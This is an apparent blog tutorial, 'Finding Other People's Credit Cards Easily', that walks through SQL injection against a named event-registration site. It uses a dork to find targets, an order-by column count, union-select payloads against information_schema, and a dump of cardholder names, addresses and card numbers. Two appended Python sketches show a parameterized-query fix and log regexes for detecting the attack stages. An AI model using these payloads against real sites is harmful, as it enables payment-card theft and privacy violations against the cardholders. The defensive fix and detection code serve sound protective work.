Tuesday, October 29, 2013

Finding Other People's Credit Cards Easily

Just sharing, no other intention..
finding CCs the layman's (my) way..

1. find a target...
a target can be found using a dork, for example:

Code:
intext:"visa" "Credit Card Number:" "Expiration Date:"
got a target..
Code:
https://plainscenter.org/ssl/register.asp?eventnumber=567

2. find bugs (the most boring step..)
finding bugs is rather tedious, because not every target has bugs that can be exploited (injected).
I usually look for bugs with a dork as well..

Code:
filetype:php site:target.com
but since the target here is already in a form that is ready for bug testing, let's go straight to it.
Code:
https://plainscenter.org/ssl/register.asp?eventnumber=567'
and the result..
Code:
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[MySQL][ODBC 5.1 Driver][mysqld-5.5.15]You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1

/ssl/register.asp, line 30

version mysqld-5.5.15, so it can be injected using the SQL injection method...
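The error page above exposes the driver, the MySQL version and the script line because the parameter is concatenated into the query and the raw driver error is returned to the client. The corresponding fix, as an added example that is not part of the original post; it uses Python's sqlite3 as a stand-in for the ASP/MySQL stack, and the table and function names are hypothetical:

```python
import sqlite3

def make_db():
    # Constructed stand-in database (sqlite3 instead of MySQL over ODBC).
    db = sqlite3.connect(":memory:")
    db.executescript(
        "CREATE TABLE events(eventnumber INTEGER PRIMARY KEY, title TEXT);"
        "INSERT INTO events VALUES (567, 'Sample event');"
    )
    return db

def lookup_vulnerable(db, eventnumber):
    # Concatenation: the parameter becomes part of the SQL text, and the
    # driver's error message is handed straight back to the client.
    sql = "SELECT title FROM events WHERE eventnumber = " + eventnumber
    try:
        return 200, db.execute(sql).fetchall()
    except sqlite3.Error as exc:
        return 500, str(exc)

def lookup_hardened(db, eventnumber):
    # 1. Allow-list validation: a short run of ASCII digits, nothing else.
    if not (eventnumber.isascii() and eventnumber.isdigit() and len(eventnumber) <= 9):
        return 400, "invalid event number"
    # 2. Bound parameter: the value is never parsed as SQL.
    try:
        rows = db.execute(
            "SELECT title FROM events WHERE eventnumber = ?", (int(eventnumber),)
        ).fetchall()
    except sqlite3.Error:
        # 3. Details go to the server log only; the client learns nothing
        #    about the driver, the version or the failing line.
        return 500, "internal error"
    return (200, rows) if rows else (404, "no such event")

if __name__ == "__main__":
    db = make_db()
    for value in ("567", "567'"):
        print(repr(value), lookup_vulnerable(db, value), lookup_hardened(db, value))
```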

3. inject..
injection can be done with the usual tools: havij, darkmysqli, sqlmap and so on..
but here I'll show it manually..
3.a

Code:
+order+by+1--
and so on..
until reaching
+order+by+28--
so
Code:
https://plainscenter.org/ssl/register.asp?eventnumber=567+and+1=0+union+all+select+1,2,3,4,5,6,7,8,9,10,11,12​,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28--
the magic numbers can be seen right away...

3.b 
tables

Code:
https://plainscenter.org/ssl/register.asp?eventnumber=567+and+1=0+union+all+select+1,2,group_concat(table_nam​e),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+inf​ormation_schema.tables+where+table_schema=database()--
The result is a comma-separated list of the table names in the current database.

3.c 
check columns
here I take the table alzpdf_booklet, to hex = 616c7a7064665f626f6f6b6c6574

Code:
https://plainscenter.org/ssl/register.asp?eventnumber=567+and+1=0+union+all+select+1,database(),group_concat(​column_name),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,2​8+from+information_schema.columns+where+table_name=0x616c7a7064665f626f6f6b6c657​4--
result
Code:
entrydatetime,First_Name,Last_Name,Organization,Address,City,State,Zip_Code,Phon​e_Number,Email_Address,Name_On_CreditCard,Credit_Card_Type,Credit_Card_Number,Cr​edit_Card_Expiration_Month,Credit_Card_Expiration_Year,Total,id,Comments,booklet​option

3.d
dump..
here I dump several columns

Code:
First_Name,0x3a,Last_Name,0x3a,Address,0x3a,City,0x3a,State,0x3a,Credit_Card_Typ​e,0x3a,Credit_Card_Number,0x3a,Credit_Card_Expiration_Month,0x3a,Credit_Card_Exp​iration_Year
Code:
https://plainscenter.org/ssl/register.asp?eventnumber=567+and+1=0+union+all+select+1,database(),group_concat(​First_Name,0x3a,Last_Name,0x3a,Address,0x3a,City,0x3a,State,0x3a,Credit_Card_Typ​e,0x3a,Credit_Card_Number,0x3a,Credit_Card_Expiration_Month,0x3a,Credit_Card_Exp​iration_Year),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,​28+from+alzpdf_booklet--
The result is the selected columns of each row, joined with colons.
actually the CCs aren't only in the alzpdf_booklet table, there are a lot of them; too bad there's no CVV..




I AM NOT RESPONSIBLE FOR ANY MISUSE OF THIS TUTORIAL
by satality32
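Each stage of the walkthrough above (quote probe, `order by` column counting, `union select`, `information_schema` enumeration) leaves a distinct trace in the web server's access log. The following detection sketch is an added example, not part of the original post; the log lines are constructed, and the combined-log layout, IP addresses and stage names are assumptions:

```python
import re
from urllib.parse import unquote_plus

# Stage signatures, matched on the URL-decoded query string, most specific first.
STAGES = [
    ("schema_enum", re.compile(r"\binformation_schema\b", re.I)),
    ("union_select", re.compile(r"\bunion\s+(all\s+)?select\b", re.I)),
    ("column_count", re.compile(r"\border\s+by\s+\d+\s*(--|#)", re.I)),
    ("quote_probe", re.compile(r"=\s*\d+'\s*$")),
]
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) [^"]*" (\d{3})')

def _line(ip, target, status):
    return f'{ip} - - [29/Oct/2013:10:00:00 +0000] "GET {target} HTTP/1.1" {status}'

# Constructed sample log (documentation IP ranges), not taken from any real server.
SAMPLE = [
    _line("203.0.113.7", "/register.asp?eventnumber=567", 200),
    _line("203.0.113.7", "/register.asp?eventnumber=567'", 500),
    _line("203.0.113.7", "/register.asp?eventnumber=567+order+by+28--", 200),
    _line("203.0.113.7", "/register.asp?eventnumber=567+and+1=0+union+all+select+1,2,3--", 200),
    _line("203.0.113.7", "/register.asp?eventnumber=567+and+1=0+union+all+select+1,"
          "group_concat(table_name)+from+information_schema.tables--", 200),
    _line("198.51.100.20", "/register.asp?eventnumber=12", 200),
]

def classify(line):
    """Return (ip, path, stage, status) for a suspicious request, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, target, status = m.groups()
    path, _, query = target.partition("?")
    decoded = unquote_plus(query)  # '+' and %xx back to plain text before matching
    for name, rx in STAGES:
        if rx.search(decoded):
            return ip, path, name, int(status)
    return None

def summarize(lines):
    """Map (ip, path) to the ordered list of distinct stages seen from that client."""
    seen = {}
    for hit in filter(None, map(classify, lines)):
        stages = seen.setdefault(hit[:2], [])
        if hit[2] not in stages:
            stages.append(hit[2])
    return seen

if __name__ == "__main__":
    for key, stages in summarize(SAMPLE).items():
        print(key, "->", " > ".join(stages))
```

A single client walking through several stages against one path is a far stronger signal than any one pattern alone, so alerting on the per-client stage list keeps false positives down.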
